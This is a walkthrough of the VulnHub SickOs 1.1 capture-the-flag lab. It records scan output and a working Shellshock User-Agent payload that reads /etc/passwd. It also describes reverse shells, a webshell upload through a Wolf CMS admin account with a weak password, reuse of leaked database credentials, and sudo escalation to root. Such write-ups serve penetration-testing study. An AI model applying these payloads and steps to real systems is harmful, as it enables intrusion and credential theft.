[VulnHub] SickOs 1.1

“This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. This vm is very similar to labs I faced in OSCP. The objective being to compromise the network/machine and gain Administrative/root privileges on them.” – D4rk

More information and OVA file download please check here.

Attacker & Target

Attacker: Kali2 Linux (10.1.1.130/24)

Target: Sick0s: 1.1 (10.1.1.149/24)

Vulnerability & Exploit

  • Squid Proxy misconfiguration
  • Shellshock bug
  • Wolf CMS 0.8.2 admin weak password
  • Sensitivie information disclosure
  • Local priv escape by misconfigured sudo list

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover running services and open ports [masscan && nmap]
  • Exploit misconfigured Squid proxy to discover more hidden ports [msfconsole with exploit: auxiliary/scanner/http/squid_pivot_scanning]
  • Web application scanned to dig more information about web service [nikto]
  • Brute fuzz to find hidden files and paths [wfuzz]
  • Login Wolf CMS 0.8.2 backend admin page with weak login credential admin / admin
  • Exploit shellcode or upload webshell through wolfcms admin to get a limited shell
  • Enumeration and exploit the misconfigured sudo list to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.149 in this case).

1
2
3
4
5
6
7
8
9
10

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.149    00:0c:29:48:e9:66   VMware, Inc.
10.1.1.254    00:50:56:ea:f1:fb   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.603 seconds (98.35 hosts/sec). 4 responded

10.1.1.149 is our Target!

Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8

root@kali:~# masscan -p1-65535 10.1.1.149/32 --rate=10000

Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-12-16 11:23:26 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.1.1.149
Discovered open port 3128/tcp on 10.1.1.149

There are 2 ports (22, 3128) detected by masscan, then I run nmap to do a deeper service scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

# Nmap 6.49BETA5 scan initiated Wed Dec 16 06:25:04 2015 as: nmap -v -O -A -sV -p22,3128 -oN 10.1.1.149_nmap.txt 10.1.1.149
Nmap scan report for 10.1.1.149
Host is up (0.0027s latency).
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open  http-proxy Squid http proxy 3.1.19
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:48:E9:66 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.19
Uptime guess: 0.019 days (since Wed Dec 16 05:58:20 2015)
Network Distance: 1 hop
... turncate ...

Based on the result, I noticed that OpenSSH 5.9p1 and Squid Proxy v3.1.19 are running on port 22 and 3128. By searching exist exploit online against the squid proxy, I found the following misconfiguration vulnerability in rapid7: Squid proxy port scanner, which can be used to do an internal network scan.

So I start msfconsole and loaded the exploit squid_pivot_scanning with the following optoins:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

msf auxiliary(squid_pivot_scanning) > show options

Module options (auxiliary/scanner/http/squid_pivot_scanning):

   Name          Current Setting                                  Required  Description
   ----          ---------------                                  --------  -----------
   CANARY_IP     1.2.3.4                                          yes       The IP to check if the proxy always answers positively; the IP should not respond.
   MANUAL_CHECK  true                                             yes       Stop the scan if server seems to answer positively to every request
   PORTS         21,80,139,443,445,1433,1521,1723,3389,8080,9100  yes       Ports to scan; must be TCP
   Proxies                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE         10.1.1.149                                       yes       IPs to scan through Squid proxy
   RHOSTS        10.1.1.149                                       yes       The target address range or CIDR identifier
   RPORT         3128                                             yes       The target port
   THREADS       200                                              yes       The number of concurrent threads
   VHOST                                                          no        HTTP server virtual host

msf auxiliary(squid_pivot_scanning) >

Run it and got the following result, TCP port 80 seems open:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

msf auxiliary(squid_pivot_scanning) > run

[+] [10.1.1.149] 10.1.1.149 is alive but 21 is CLOSED
[+] [10.1.1.149] 10.1.1.149:80 seems OPEN
[+] [10.1.1.149] 10.1.1.149 is alive but 139 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 445 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 1433 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 1521 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 1723 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 3389 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 8080 is CLOSED
[+] [10.1.1.149] 10.1.1.149 is alive but 9100 is CLOSED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(squid_pivot_scanning) >

In order to the verify if port 80 is open, I start up firefox and set the proxy points to 10.1.1.149:3128 then access http://10.1.1.149/.

and yes, there is web service listening on target machine’s port 80.

Then I use nikto to scan common web vulnerabilities.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

- Nikto v2.1.6/2.1.5
+ Target Host: 10.1.1.149
+ Target Port: 80
+ GET Retrieved via header: 1.0 localhost (squid/3.1.19)
+ GET Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ GET The anti-clickjacking X-Frame-Options header is not present.
+ GET The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ GET Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ GET Uncommon header 'x-cache' found, with contents: MISS from localhost
+ GET The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ GET Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015
+ GET Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ GET Uncommon header 'tcn' found, with contents: list
+ GET Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ GET Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: GET /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6271).
+ OSVDB-112004: GET /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (CVE-2014-6278).
+ ZSMPGCHN Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: GET /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3093: GET /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3233: GET /icons/README: Apache default file found.

From the result, a shellsock vulnerability was found in target server under the path /cgi-bin/status.

In the meanwhile, I also run wfuzz to brute force crack/scan the hidden files/directories on the target server.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

root@kali:~/SickOs# wfuzz -c -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt --hc 404 -p 10.1.1.149:3128 http://10.1.1.149/FUZZ

********************************************************
* Wfuzz  2.0 - The Web Bruteforcer                     *
********************************************************

Target: http://10.1.1.149/FUZZ
Payload type: file,/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

Total requests: 87664
==================================================================
ID    Response   Lines      Word         Chars          Request
==================================================================

00001:  C=200      3 L          3 W        21 Ch     " - # Copyright 2007 James Fisher"
00002:  C=200      3 L          3 W        21 Ch     "sit http://creativecommons.org/licenses/by-sa/3.0/"
00003:  C=200      3 L          3 W        21 Ch     " - #"
00004:  C=200      3 L          3 W        21 Ch     "ered case sensative list, where entries were found"
00005:  C=200      3 L          3 W        21 Ch     " - #"
00006:  C=200      3 L          3 W        21 Ch     "on-Share Alike 3.0 License. To view a copy of this"
00007:  C=200      3 L          3 W        21 Ch     " - #"
00008:  C=200      3 L          3 W        21 Ch     " - "
00009:  C=200      3 L          3 W        21 Ch     " - # on atleast 3 different hosts"
00011:  C=200      3 L          3 W        21 Ch     " - #"
00014:  C=200      3 L          3 W        21 Ch     "# This work is licensed under the Creative Commons"
00015:  C=200      3 L          3 W        21 Ch     "d a letter to Creative Commons, 171 Second Street,"
00016:  C=200      3 L          3 W        21 Ch     " - # directory-list-2.3-small.txt"
00010:  C=200      3 L          3 W        21 Ch     " Suite 300, San Francisco, California, 94105, USA."
00294:  C=200      3 L          3 W        21 Ch     " - index"
01601:  C=200      4 L         17 W       109 Ch     " - connect"
01770:  C=200      3 L          6 W        45 Ch     " - robots"
Stopping...

root@kali:~/SickOs#

Here I found three hidden files, after checked them one by one, I noticed that there is another hidden path /wolfcms found in file http://10.1.1.149/robots.

[note!!] From now on, there are two attacking vectors against the target server, one is to exploit shellshock vulnerability found previously in http://10.1.1.149/cgi-bin/status and the other one is to find and exploit vulnerability in the CMS system: wolfcms.

0x00 Verify and exploit shell bug

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

root@kali:~/SickOs# wget -q -O- -U -e use_proxy=on -e http_proxy=10.1.1.149:3128 "http://10.1.1.149"
<h1>
BLEHHH!!!
</h1>
root@kali:~/SickOs# wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=10.1.1.149:3128 "http://10.1.1.149/cgi-bin/status"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

It works!, the file /etc/passwd can be read and I also noticed that there is an user called sickos which would be used to privilege escaping later. shellshock vulnerability has been confirmed and can be exploited.

So then, I setup nc to listen on local port 4444 and exploit shellshock to get a connection back.

Bingo! Now we have got a limited remote shell connect back to my tcp port 4444 which is listened by nc.

0x01 Analyze and exploit Wolf CMS 0.8.2

By searching online about wolfcms, learn it to know that it has login page: http://10.1.1.149/wolfcms/?/admin/login

After tried several weak passwords, I managed to login successful with the weak login credential: admin / admin

Under the file_manager, I can upload php shell to target server. In this case I uploaded a reverse php shell (rsh.php) which will connected back to my Kali’s port 5555.

Then I have to change the file attributes to 0777.

From what I learnt online, the uploaded php shell can be found in /public/ folder, so I set up nc again to listen on port 5555 and visit this URL http://10.1.1.149/wolfcms/public/rsh.php to trigger the reverse shell.

Now I get in~

It’s time to ROOT!

After enumeration on the file system, I found a configuration file which including sensitive information / login credentials, the file location is /var/www/wolfcms/config.php.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

www-data@SickOs:/usr/lib/cgi-bin$ head -n 15 /var/www/wolfcms/config.php
head -n 15 /var/www/wolfcms/config.php
<\?php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);
www-data@SickOs:/usr/lib/cgi-bin$

By checking the configuration file, I found DB user is root and password is john@123. I try to login SSH as user root with the compromised key john@123 but failed. Then I try to SSH login as user sickos.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

root@kali:~# ssh sickos@10.1.1.149
sickos@10.1.1.149's password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Wed Dec 16 18:37:11 IST 2015

  System load:  0.0               Processes:           115
  Usage of /:   4.3% of 28.42GB   Users logged in:     0
  Memory usage: 12%               IP address for eth0: 10.1.1.149
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

124 packages can be updated.
92 updates are security updates.

New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Dec 15 18:12:43 2015 from 10.1.1.130
sickos@SickOs:~$ id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
sickos@SickOs:~$

Got in! Then I did enumeration over the target machine and found user sickos is able to use sudo command to run any commands as root privilege.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sickos may run the following commands on this host:
    (ALL : ALL) ALL

sickos@SickOs:~$ sudo su
root@SickOs:/home/sickos# id
uid=0(root) gid=0(root) groups=0(root)
root@SickOs:/home/sickos# ls -al /root
total 40
drwx------  3 root root 4096 Dec  6 21:14 .
drwxr-xr-x 22 root root 4096 Sep 22 08:13 ..
-rw-r--r--  1 root root   96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3977 Dec 15 19:18 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep 22 08:33 .cache
-rw-------  1 root root   22 Dec  5 06:24 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5230 Dec  6 21:14 .viminfo

root@SickOs:/home/sickos# cat /root/a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


root@SickOs:/home/sickos#

Done with smile :) !!

2015-12-25 14:22:17 +1100
sickos, vulnhub